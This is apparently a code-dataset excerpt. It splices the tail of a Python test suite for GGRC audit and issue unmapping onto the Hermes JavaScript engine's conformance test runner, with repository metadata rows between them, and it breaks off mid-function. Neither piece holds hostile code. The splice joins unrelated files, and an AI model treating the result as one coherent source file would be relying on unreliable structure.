factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert400(response)
def test_delete_audit_with_issue(self):
"""Audit can be deleted if mapped to Issue, Issue is unmapped."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
response = self.generator.api.delete(self.audit)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.audit)
self.assertIsNotNone(self.issue_mapped)
self.assertIsNone(self.issue_mapped.context_id)
self.assertIsNone(self.issue_mapped.audit_id)
def test_delete_issue_with_audit(self):
"""Issue can be deleted if mapped to Audit."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
response = self.generator.api.delete(self.issue_mapped)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.issue_mapped)
self.assertIsNotNone(self.audit)
def test_delete_issue_with_audit_and_snapshot(self):
"""Issue can be deleted if mapped to Audit and Snapshot."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_mapped)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.issue_mapped)
self.assertIsNotNone(self.audit)
def test_delete_audit_with_issue_and_snapshot(self):
"""Audit can be deleted if mapped to Issue mapped to Snapshot."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.audit)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.audit)
self.assertIsNotNone(self.issue_mapped)
self.assertIsNone(self.issue_mapped.context_id)
self.assertIsNone(self.issue_mapped.audit_id)
class TestIssueUnmap(TestCase):
"""Test suite to check the rules for Issue-Audit mappings."""
def setUp(self):
"""Setup tests data"""
super(TestIssueUnmap, self).setUp()
self.generator = generator.ObjectGenerator(fail_no_json=False)
# TODO: replace this hack with a special test util
from ggrc.login import noop
noop.login() # this is needed to pass the permission checks in automapper
with factories.single_commit():
audit = factories.AuditFactory()
self.audit_id = audit.id
assessments = [
factories.AssessmentFactory(audit=audit) for _ in range(2)
]
controls = [factories.ControlFactory() for _ in range(2)]
snapshots = self._create_snapshots(audit, controls)
self.snapshot_ids = [s.id for s in snapshots]
issue = factories.IssueFactory()
self.issue_id = issue.id
factories.RelationshipFactory(source=audit, destination=assessments[0])
factories.RelationshipFactory(source=audit, destination=assessments[1])
factories.RelationshipFactory(
source=assessments[0], destination=snapshots[0]
)
factories.RelationshipFactory(
source=assessments[0], destination=snapshots[1]
)
factories.RelationshipFactory(
source=assessments[1], destination=snapshots[1]
)
self.unmap_rel_id1 = factories.RelationshipFactory(
source=issue, destination=assessments[0]
).id
self.unmap_rel_id2 = factories.RelationshipFactory(
source=issue, destination=assessments[1]
).id
def get_relationships(self, obj1_id, obj1_type, obj2_id, obj2_type):
"""Get relationships between objects"""
# pylint: disable=no-self-use
return db.session.query(all_models.Relationship.id).filter_by(
source_type=obj1_type,
source_id=obj1_id,
destination_type=obj2_type,
destination_id=obj2_id,
).union(
db.session.query(all_models.Relationship.id).filter_by(
source_type=obj2_type,
source_id=obj2_id,
destination_type=obj1_type,
destination_id=obj1_id,
)
)
def test_issue_cascade_unmap(self):
"""Test cascade unmapping Issue from Assessment"""
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
snap0_issue_rel = self.get_relationships(
self.snapshot_ids[0], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap0_issue_rel.count(), 0)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id1).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 8)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
issue = all_models.Issue.query.get(self.issue_id)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 0)
self.assertEqual(audit_issue_rel.count(), 0)
self.assertIsNone(issue.audit_id)
self.assertIsNone(issue.context_id)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id2).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 5)
def test_cascade_unmap_automapped(self):
"""Test if cascade unmapping Issue will not work for automapped"""
# Set all Relationships as manually created
db.session.query(all_models.Relationship).update({"automapping_id": None})
db.session.commit()
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
# No Issue-Snapshot, no Issue-Audit relationships should be removed
# as they manually mapped
snap0_issue_rel = self.get_relationships(
self.snapshot_ids[0], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap0_issue_rel.count(), 1)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 1)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(audit_issue_rel.count(), 1)
def test_cascade_unmap_man_audit(self):
"""Test cascade unmapping Issue from Audit if it manually mapped"""
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
all_models.Relationship.query.filter(
all_models.Relationship.id.in_(audit_issue_rel.subquery())
).update({"automapping_id": None}, synchronize_session="fetch")
db.session.commit()
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
# Snapshot is unmapped in cascade as it's automapped
self.assertEqual(all_models.Relationship.query.count(), 8)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 0)
# Audit is not removed in cascade as it was manually created
self.assertEqual(audit_issue_rel.count(), 1)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id2).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 6)
| 38.034483
| 79
| 0.681647
|
fedac9faf25e949d83a034c051f6a26f524ea8e0
| 36,613
|
py
|
Python
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | 1
|
2021-05-12T13:38:27.000Z
|
2021-05-12T13:38:27.000Z
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | 6
|
2021-03-01T21:22:38.000Z
|
2022-02-26T02:00:00.000Z
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import enum
import os
import re
import subprocess
import sys
import tempfile
import textwrap
import time
from collections import namedtuple
from multiprocessing import Pool, Value
from os.path import basename, isdir, isfile, join, splitext
try:
from testsuite.testsuite_skiplist import (
SKIP_LIST,
PERMANENT_SKIP_LIST,
UNSUPPORTED_FEATURES,
PERMANENT_UNSUPPORTED_FEATURES,
)
import testsuite.esprima_test_runner as esprima
except ImportError:
# Hacky way to handle non-buck builds that call the file immediately.
from testsuite_skiplist import (
SKIP_LIST,
PERMANENT_SKIP_LIST,
UNSUPPORTED_FEATURES,
PERMANENT_UNSUPPORTED_FEATURES,
)
import esprima_test_runner as esprima
## This is a simple script that runs the hermes compiler on
## external test suites. The script expects to find the hermes compiler under
## ./bin/hermes. The script adds
## some basic test built-ins such as assertTrue, assertEquals that are used in
## the V8 test suite.
## How results are computed:
## If a test is on the skip list or contains unsupported ES6 features,
## it is skipped, and thus not executed at all.
## Result classes:
## Compile fail: The Hermes compiler failed when it should have succeeded,
## or vice versa.
## Compile timeout: The Hermes compiler timed out.
## Execute fail: Bytecode execution with the chosen backend
## failed when it should have succeeded, or vice versa.
## Execute timeout: Bytecode execution with the chosen backend timed out.
## Strictness:
## The default strictness mode is currently non-strict.
## For the test suites themselves:
## - test262: Require the test to pass in both strictness modes,
## generating source code for both modes automatically.
## - mjsunit: Run the tests in non-strict mode,
## because the test suite adds its own "use strict" directives.
## The content of this string is prepended to the test files and is used to
## provide the basic test built-ins.
test_builtins_content = """
// v8 test harness:
function internal_arraysEqual(a, b) {
if (a === b) return true;
if (a.length != b.length) return false;
for (var i = 0; i < a.length; ++i) { if (a[i] !== b[i]) return false; }
return true;
}
function builtin_nop(x) { return x; }
function builtin_false() { return false; }
var nopSentinel = {};
function v8pragma_HaveSameMap(obj1, obj2) {
// This function doesn't work for all tests, but works for many.
var keysAreSubset = function(lhs, rhs) {
for (var property in lhs) {
if (lhs[property] !== rhs[property]) {
return false;
}
}
return true;
}
return keysAreSubset(obj1, obj2) && keysAreSubset(obj2, obj1);
}
function v8pragma_FunctionSetPrototype(f, p) {
// Set f.prototype.
f.prototype = p;
}
function v8pragma_ClassOf(obj) {
// Turn "[object ClassName]" into just "ClassName".
return Object.prototype.toString.call(obj).slice(8, -1);
}
function v8pragma_Call(f, thisVal) {
return f.apply(thisVal, Array.prototype.slice.call(arguments, 2));
}
function v8pragma_StringCharFromCode(i) {
return String.fromCharCode(i);
}
function v8pragma_StringCharCodeAt(s, i) {
return s.charCodeAt(i);
}
// debug variable sometimes used in mjsunit.
// Implemented the same way JSC does.
var debug = function(s) {
print('-->', s);
};
// The idea here is that some pragmas are meaningless for our JS interpreter,
// but we don't want to throw out the whole test case. In those cases, just
// throw out the assertions in those test cases resulting from checking the
// results of those pragmas.
function v8pragma_NopSentinel() {
return nopSentinel;
}
// test262 requirements.
// Leave the unimplemented features unset in $262.
var $262 = {};
$262.global = this;
$262.evalScript = eval;
if (typeof HermesInternal === 'object') {
$262.detachArrayBuffer = HermesInternal.detachArrayBuffer;
}
// Browser functions:
var alert = print;
"""
# Colors for stdout.
@enum.unique
class Color(enum.Enum):
RESET = enum.auto()
RED = enum.auto()
GREEN = enum.auto()
def __str__(self):
if not sys.stdout.isatty():
return ""
return {
Color.RESET.value: "\033[0m",
Color.RED.value: "\033[31m",
Color.GREEN.value: "\033[32m",
}[self.value]
# These flags indicate the status of a job.
@enum.unique
class TestFlag(enum.Enum):
TEST_FAILED = enum.auto()
TEST_PASSED = enum.auto()
TEST_SKIPPED = enum.auto()
TEST_PERMANENTLY_SKIPPED = enum.auto()
TEST_UNEXPECTED_PASSED = enum.auto()
COMPILE_FAILED = enum.auto()
COMPILE_TIMEOUT = enum.auto()
EXECUTE_FAILED = enum.auto()
EXECUTE_TIMEOUT = enum.auto()
def __str__(self):
return {
TestFlag.TEST_FAILED.value: "TEST_FAILED",
TestFlag.TEST_PASSED.value: "TEST_PASSED",
TestFlag.TEST_SKIPPED.value: "TEST_SKIPPED",
TestFlag.TEST_PERMANENTLY_SKIPPED.value: "TEST_PERMANENTLY_SKIPPED",
TestFlag.TEST_UNEXPECTED_PASSED.value: "TEST_UNEXPECTED_PASSED",
TestFlag.COMPILE_FAILED.value: "COMPILE_FAILED",
TestFlag.COMPILE_TIMEOUT.value: "COMPILE_TIMEOUT",
TestFlag.EXECUTE_FAILED.value: "EXECUTE_FAILED",
TestFlag.EXECUTE_TIMEOUT.value: "EXECUTE_TIMEOUT",
}[self.value]
TIMEOUT_COMPILER = 200
TIMEOUT_VM = 200
includesMatcher = re.compile(r"includes:\s*\[(.*)\]")
# This matches a special case in which the includes looks like:
# includes:
# - foo.js
# This regex works only because the few cases which use this pattern
# only include one file.
specialIncludesMatcher = re.compile(
"includes:\n" r".*-\s*(.*\.js)" "\n", re.MULTILINE | re.DOTALL
)
def generateSource(content, strict, suite, flags):
"""
Generate the source code for a test case resulting from resolving pragmas in
the given file and adding a use-strict directive, if necessary.
Return a tuple: (source, includes)
"""
# The raw flag specifies that the source code shouldn't be modified.
if "raw" in flags:
return (content, [])
v8_pragmas = {
"%OptimizeObjectForAddingMultipleProperties": "builtin_nop",
"%ClearFunctionTypeFeedback": "builtin_nop",
"%OptimizeFunctionOnNextCall": "builtin_nop",
"%DeoptimizeFunction": "builtin_nop",
"%DeoptimizeNow": "builtin_nop",
"%_DeoptimizeNow": "builtin_nop",
"%NeverOptimizeFunction": "builtin_nop",
"%OptimizeOsr": "builtin_nop",
"%ClearFunctionTypeFeedback": "builtin_nop",
"%BaselineFunctionOnNextCall": "builtin_nop",
"%SetForceInlineFlag": "builtin_nop",
"%OptimizeObjectForAddingMultipleProperties": "builtin_nop",
"%ToFastProperties": "builtin_nop",
"%NormalizeElements": "builtin_nop",
"%ArrayBufferNeuter": "HermesInternal.detachArrayBuffer",
# ArrayBufferDetach is the more modern version of ArrayBufferNeuter.
"%ArrayBufferDetach": "HermesInternal.detachArrayBuffer",
"%RunMicrotasks": "builtin_nop",
"%SetAllocationTimeout": "builtin_nop",
"%UnblockConcurrentRecompilation": "builtin_nop",
"%DebugPrint": "builtin_nop",
"%HaveSameMap": "v8pragma_HaveSameMap",
"%HasFastDoubleElements": "v8pragma_NopSentinel",
"%HasFastSmiElements": "v8pragma_NopSentinel",
"%HasFastObjectElements": "v8pragma_NopSentinel",
"%HasFastHoleyElements": "v8pragma_NopSentinel",
"%HasFastProperties": "v8pragma_NopSentinel",
"%IsAsmWasmCode": "v8pragma_NopSentinel",
"%IsNotAsmWasmCode": "v8pragma_NopSentinel",
"%NotifyContextDisposed": "v8pragma_NopSentinel",
"%FunctionSetPrototype": "v8pragma_FunctionSetPrototype",
"%_ClassOf": "v8pragma_ClassOf",
"%_Call": "v8pragma_Call",
"%RunningInSimulator": "builtin_false",
"%IsConcurrentRecompilationSupported": "builtin_false",
"%_StringCharFromCode": "v8pragma_StringCharFromCode",
"%_StringCharCodeAt": "v8pragma_StringCharCodeAt",
}
for pragma, replacement in v8_pragmas.items():
content = content.replace(pragma, replacement)
source = ""
if strict:
source += "'use strict';\n"
includes = []
if suite:
if "test262" in suite:
match = includesMatcher.search(content)
includes = ["assert.js", "sta.js"]
if match:
includes += [i.strip() for i in match.group(1).split(",")]
match = specialIncludesMatcher.search(content)
if match:
includes.append(match.group(1))
for i in includes:
filepath = join(suite, "harness", i)
with open(filepath, "rb") as f:
source += f.read().decode("utf-8") + "\n"
if "mjsunit" in suite:
filepath = join(suite, "mjsunit.js")
with open(filepath, "rb") as f:
source += f.read().decode("utf-8") + "\n"
source += test_builtins_content
source += content
return (source, includes)
evalMatcher = re.compile(r"\beval\s*\(")
indirectEvalMatcher = re.compile(r"\(.*,\s*eval\)\s*\(")
assignEvalMatcher = re.compile(r"=\s*eval\s*;")
withMatcher = re.compile(r"\bwith\s*\(")
constMatcher = re.compile(r"\bconst\b")
negativeMatcher = re.compile(
r"""
/\*---.*
negative:.*\n
\s*phase:\s*(\S+).*\n
\s*type:\s*(\S+).*\n
---\*/
""",
re.MULTILINE | re.DOTALL | re.VERBOSE,
)
negativeMatcher2 = re.compile(
r"""
/\*---.*
negative:.*\n
\s*type:\s*(\S+).*\n
\s*phase:\s*(\S+).*\n
---\*/
""",
re.MULTILINE | re.DOTALL | re.VERBOSE,
)
flagsMatcher = re.compile(r"\s*flags:\s*\[(.*)\]")
featuresMatcher = re.compile(r"\s*features:\s*\[(.*)\]")
# Alternate features syntax has "features:" and then bullet points using "-".
featuresMatcher2 = re.compile(r"\s*features:\s*\n(.*)\*\/", re.MULTILINE | re.DOTALL)
def getSuite(filename):
suite = None
# Try all possible test suites to see which one we're in.
for s in ["test262", "mjsunit", "CVEs", "esprima"]:
if (s + "/") in filename:
suite = filename[: filename.find(s) + len(s)]
break
return suite
verbose = False
def printVerbose(s):
global verbose
if verbose:
print(s)
istty = sys.stdout.isatty()
completed = Value("i", 0)
ttyWidth = os.get_terminal_size().columns if istty else 0
def showStatus(filename):
global completed, istty, verbose, count
if istty and not verbose and count > 0:
with completed.get_lock():
record = ("\r{:" + str(ttyWidth) + "s}\n").format("Testing " + filename)
status = "{:06.2f}% ({:d} / {:d})".format(
100.0 * completed.value / count, completed.value, count
)
sys.stdout.write(record + status)
sys.stdout.flush()
completed.value += 1
else:
print("Testing " + filename)
es6_args = ["-Xes6-proxy", "-Xes6-symbol"]
extra_run_args = ["-Xhermes-internal-test-methods"]
extra_compile_flags = ["-fno-static-builtins"]
def fileInSkiplist(filename):
for blName in SKIP_LIST + PERMANENT_SKIP_LIST:
if isinstance(blName, str):
if blName in filename:
return True
else:
# Assume it's a regex if it's not a string.
if blName.search(filename):
return True
return False
def fileInPermanentSkiplist(filename):
for blName in PERMANENT_SKIP_LIST:
if blName in filename:
return True
return False
# should_run: bool, If the test should run
# skip_reason: str, Reason for skipping, if the test shouldn't be run.
# Empty if the test should be run (str)
# permanent: bool, If the test shouldn't be run, whether that condition is permanent
# flags: Set[str], The flags that were found for the file
# strict_modes: List[str], The strict modes that this file should be run with
TestContentParameters = namedtuple(
"TestContentFlags",
["should_run", "skip_reason", "permanent", "flags", "strict_modes"],
)
def testShouldRun(filename, content):
suite = getSuite(filename)
# Determine flags and strict modes before deciding to skip a test case.
flags = set()
strictModes = []
if not suite:
strictModes = [False]
else:
if "test262" in suite:
match = flagsMatcher.search(content)
if match:
flags = {flag.strip() for flag in match.group(1).split(",")}
if "onlyStrict" in flags:
strictModes = [True]
elif "noStrict" in flags or "raw" in flags:
strictModes = [False]
else:
strictModes = [True, False]
else:
strictModes = [True, False]
elif "mjsunit" in suite:
strictModes = [False]
elif "CVEs" in suite:
strictModes = [False]
else:
raise Exception("Unknown suite")
# Now find if this test case should be skipped.
if "async" in flags:
# We don't support async operations.
return TestContentParameters(
False, "Skipping test with async", False, flags, strictModes
)
if "module" in flags:
# We don't support module code.
return TestContentParameters(
False, "Skipping test with modules", False, flags, strictModes
)
# Be picky about which tests to run unless we are running the CVEs suite
runAll = "CVEs" in suite
if not runAll:
# Skip tests that use 'eval'.
if evalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with eval()", True, flags, strictModes
)
# Skip tests that use indirect 'eval' that look like (1, eval)(...).
if indirectEvalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with indirect eval()", True, flags, strictModes
)
# Skip tests that use indirect 'eval' by assigning a variable to eval.
if assignEvalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with alias to eval()", True, flags, strictModes
)
# Skip tests that use 'with'.
if withMatcher.search(content):
return TestContentParameters(
False, "Skipping test with with()", True, flags, strictModes
)
if constMatcher.search(content):
return TestContentParameters(
False, "Skipping test with 'const'", False, flags, strictModes
)
if suite and "test262" in suite:
# Skip unsupported features.
match = featuresMatcher.search(content)
match2 = featuresMatcher2.search(content)
features = set()
if match:
features.update(feature.strip() for feature in match.group(1).split(","))
if match2:
features.update(
feature.strip(" \t\n\r-") for feature in match2.group(1).split("\n")
)
features.discard("")
for f in features:
if f in UNSUPPORTED_FEATURES + PERMANENT_UNSUPPORTED_FEATURES:
return TestContentParameters(
False,
"Skipping unsupported feature: " + f,
f in PERMANENT_UNSUPPORTED_FEATURES,
flags,
strictModes,
)
return TestContentParameters(True, "", False, flags, strictModes)
ESPRIMA_TEST_STATUS_MAP = {
esprima.TestStatus.TEST_PASSED: TestFlag.TEST_PASSED,
esprima.TestStatus.TEST_FAILED: TestFlag.COMPILE_FAILED,
esprima.TestStatus.TEST_SKIPPED: TestFlag.TEST_SKIPPED,
esprima.TestStatus.TEST_TIMEOUT: TestFlag.COMPILE_TIMEOUT,
}
def runTest(filename, test_skiplist, keep_tmp, binary_path, hvm, esprima_runner):
"""
Runs a single js test pointed by filename
"""
baseFileName = basename(filename)
suite = getSuite(filename)
skiplisted = fileInSkiplist(filename)
skippedType = (
TestFlag.TEST_PERMANENTLY_SKIPPED
if fileInPermanentSkiplist(filename)
else TestFlag.TEST_SKIPPED
)
if skiplisted and not test_skiplist:
printVerbose(
"Skipping test in skiplist{}: {}".format(
" (permanently)"
if skippedType is TestFlag.TEST_PERMANENTLY_SKIPPED
else "",
filename,
)
)
return (skippedType, "", 0)
showStatus(filename)
if "esprima" in suite:
hermes_path = os.path.join(binary_path, "hermes")
test_res = esprima_runner.run_test(filename, hermes_path)
return (
ESPRIMA_TEST_STATUS_MAP[test_res[0]],
"" if test_res[0] == esprima.TestStatus.TEST_PASSED else test_res[1],
0,
)
content = open(filename, "rb").read().decode("utf-8")
shouldRun, skipReason, permanent, flags, strictModes = testShouldRun(
filename, content
)
if not shouldRun:
skippedType = (
TestFlag.TEST_SKIPPED
if not permanent
else TestFlag.TEST_PERMANENTLY_SKIPPED
)
if not test_skiplist:
printVerbose(
skipReason
+ "{}: ".format(" (permanently)" if permanent else "")
+ filename
)
return (skippedType, "", 0)
# Check if the test is expected to fail, and how.
negativePhase = ""
m = negativeMatcher.search(content)
if m:
negativePhase = m.group(1)
else:
m = negativeMatcher2.search(content)
if m:
negativePhase = m.group(2)
# Report the max duration of any successful run for the variants of a test.
# Unsuccessful runs are ignored for simplicity.
max_duration = 0
for strictEnabled in strictModes:
temp = tempfile.NamedTemporaryFile(
prefix=splitext(baseFileName)[0] + "-", suffix=".js", delete=False
)
source, includes = generateSource(content, strictEnabled, suite, flags)
source = source.encode("utf-8")
if "testIntl.js" in includes:
# No support for multiple Intl constructors in that file.
return (TestFlag.TEST_SKIPPED, "", 0)
temp.write(source)
temp.close()
printVerbose("\n==============")
printVerbose("Strict Mode: {}".format(str(strictEnabled)))
printVerbose("Temp js file name: " + temp.name)
errString = ""
binfile = tempfile.NamedTemporaryFile(
prefix=splitext(baseFileName)[0] + "-", suffix=".hbc", delete=False
)
binfile.close()
for optEnabled in (True, False):
printVerbose("\nRunning with Hermes...")
printVerbose("Optimization: {}".format(str(optEnabled)))
run_vm = True
start = time.time()
# Compile to bytecode with Hermes.
try:
printVerbose("Compiling: {} to {}".format(filename, binfile.name))
args = (
[
os.path.join(binary_path, "hermes"),
temp.name,
"-hermes-parser",
"-emit-binary",
"-out",
binfile.name,
]
+ es6_args
+ extra_compile_flags
)
if optEnabled:
args.append("-O")
else:
args.append("-O0")
if strictEnabled:
args.append("-strict")
else:
args.append("-non-strict")
subprocess.check_output(
args, timeout=TIMEOUT_COMPILER, stderr=subprocess.STDOUT
)
if negativePhase == "early" or negativePhase == "parse":
run_vm = False
printVerbose(
"FAIL: Compilation failure expected on {} with Hermes".format(
baseFileName
)
)
# If the test was in the skiplist, it was possible a
# compiler failure was expected. Else, it is unexpected and
# will return a failure.
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_FAILED, "", 0)
)
except subprocess.CalledProcessError as e:
run_vm = False
if negativePhase != "early" and negativePhase != "parse":
printVerbose(
"FAIL: Compilation failed on {} with Hermes".format(
baseFileName
)
)
errString = e.output.decode("utf-8").strip()
printVerbose(textwrap.indent(errString, "\t"))
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_FAILED, errString, 0)
)
printVerbose("PASS: Hermes correctly failed to compile")
except subprocess.TimeoutExpired:
printVerbose("FAIL: Compilation timed out on {}".format(baseFileName))
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_TIMEOUT, "", 0)
)
# If the compilation succeeded, run the bytecode with the specified VM.
if run_vm:
try:
printVerbose("Running with HBC VM: {}".format(filename))
# Run the hermes vm.
args = (
[os.path.join(binary_path, hvm), binfile.name]
+ es6_args
+ extra_run_args
)
env = {"LC_ALL": "en_US.UTF-8"}
if sys.platform == "linux":
env["ICU_DATA"] = binary_path
subprocess.check_output(
args, timeout=TIMEOUT_VM, stderr=subprocess.STDOUT, env=env
)
if negativePhase == "runtime":
printVerbose("FAIL: Expected execution to throw")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_FAILED, "", 0)
)
else:
printVerbose("PASS: Execution completed successfully")
except subprocess.CalledProcessError as e:
if negativePhase != "runtime":
printVerbose(
"FAIL: Execution of {} threw unexpected error".format(
filename
)
)
printVerbose("Return code: {}".format(e.returncode))
if e.output:
printVerbose("Output:")
errString = e.output.decode("utf-8").strip()
printVerbose(textwrap.indent(errString, "\t"))
else:
printVerbose("No output received from process")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_FAILED, errString, 0)
)
else:
printVerbose(
"PASS: Execution of binary threw an error as expected"
)
except subprocess.TimeoutExpired:
printVerbose("FAIL: Execution of binary timed out")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_TIMEOUT, "", 0)
)
max_duration = max(max_duration, time.time() - start)
if not keep_tmp:
os.unlink(temp.name)
os.unlink(binfile.name)
if skiplisted:
# If the test was skiplisted, but it passed successfully, consider that
# an error case.
printVerbose("FAIL: A skiplisted test completed successfully")
return (TestFlag.TEST_UNEXPECTED_PASSED, "", max_duration)
else:
printVerbose("PASS: Test completed successfully")
return (TestFlag.TEST_PASSED, "", max_duration)
def makeCalls(params, onlyfiles, rangeLeft, rangeRight):
global count
# Store all test parameters in calls[].
calls = []
count = -1
for f in onlyfiles:
count += 1
if count < rangeLeft or count > rangeRight:
continue
calls.append((f,) + params)
return calls
def calcParams(params):
return (params[0], runTest(*params))
def testLoop(calls, jobs, fail_fast, num_slowest_tests):
results = []
# Histogram for results from the Hermes compiler.
resultsHist = {
TestFlag.COMPILE_FAILED: 0,
TestFlag.COMPILE_TIMEOUT: 0,
TestFlag.EXECUTE_FAILED: 0,
TestFlag.EXECUTE_TIMEOUT: 0,
TestFlag.TEST_PASSED: 0,
TestFlag.TEST_SKIPPED: 0,
TestFlag.TEST_PERMANENTLY_SKIPPED: 0,
TestFlag.TEST_UNEXPECTED_PASSED: 0,
}
slowest_tests = [("", 0)] * num_slowest_tests
with Pool(processes=jobs) as pool:
for res in pool.imap_unordered(calcParams, calls, 1):
testname = res[0]
results.append(res)
(hermesStatus, errString, duration) = res[1]
resultsHist[hermesStatus] += 1
insert_pos = len(slowest_tests)
for i, (_, other_duration) in reversed(list(enumerate(slowest_tests))):
if duration < other_duration:
break
else:
insert_pos = i
if insert_pos < len(slowest_tests):
# If this was one of the slowest tests, push it into the list
# and drop the bottom of the list.
slowest_tests = (
slowest_tests[:insert_pos]
+ [(testname, duration)]
+ slowest_tests[insert_pos:-1]
)
if (
fail_fast
and hermesStatus != TestFlag.TEST_PASSED
and hermesStatus != TestFlag.TEST_SKIPPED
and hermesStatus != TestFlag.TEST_PERMANENTLY_SKIPPED
):
break
# Filter out missing test names in case there were fewer tests run than the top slowest tests.
slowest_tests = [
(testName, duration) for testName, duration in slowest_tests if testName
]
return results, resultsHist, slowest_tests
def get_arg_parser():
parser = argparse.ArgumentParser(description="Run javascript tests with Hermes.")
parser.add_argument(
"paths",
type=str,
nargs="+",
help="Paths to test suite, can be either dir or file name",
)
parser.add_argument(
"-c",
"--chunk",
dest="chunk",
default=-1,
type=int,
help="Chunk ID (0, 1, 2), to only process 1/3 of all tests",
)
parser.add_argument(
"-f",
"--fast-fail",
dest="fail_fast",
action="store_true",
help="Exit script immediately when a test failed.",
)
parser.add_argument(
"-k",
"--keep-tmp",
dest="keep_tmp",
action="store_true",
help="Keep temporary files of successful tests.",
)
parser.add_argument(
"--test-skiplist",
dest="test_skiplist",
action="store_true",
help="Also test if tests in the skiplist fail",
)
parser.add_argument(
"-a",
"--show-all",
dest="show_all",
action="store_true",
help="show results of successful tests.",
)
parser.add_argument(
"--hvm-filename",
dest="hvm_filename",
default="hvm",
help="Filename for hvm binary (e.g., hvm-lean)",
)
parser.add_argument(
"-j",
"--jobs",
dest="jobs",
default=None,
type=int,
help="Number of jobs to run simultaneously. By default "
+ "equal to the number of CPUs.",
)
parser.add_argument(
"-m",
"--match",
dest="match",
default=None,
type=str,
help="Optional. Substring that the test filename must "
"contain in order to run.",
)
parser.add_argument(
"-s",
"--source",
dest="source",
action="store_true",
help="Instead of running any tests, print the source of "
"the matched test case (use -m/--match) to standard "
"output, including any generated use-strict "
"directives or stubbed pragmas. (You could then "
"pipe this to hermes.)",
)
parser.add_argument(
"--num-slowest-tests",
dest="num_slowest_tests",
type=int,
default=10,
help="Print the top N tests that take the longest time to execute on "
"average, where N is the option value",
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",
default=False,
action="store_true",
help="Show intermediate output",
)
return parser
def run(
paths,
chunk,
fail_fast,
binary_path,
hvm,
jobs,
is_verbose,
match,
source,
test_skiplist,
num_slowest_tests,
keep_tmp,
show_all,
):
global count
global verbose
verbose = is_verbose
onlyfiles = []
for path in paths:
if isdir(path):
for root, _dirnames, filenames in os.walk(path):
for filename in filenames:
onlyfiles.append(os.path.join(root, filename))
elif isfile(path):
onlyfiles.append(path)
else:
print("Invalid path: " + path)
sys.exit(1)
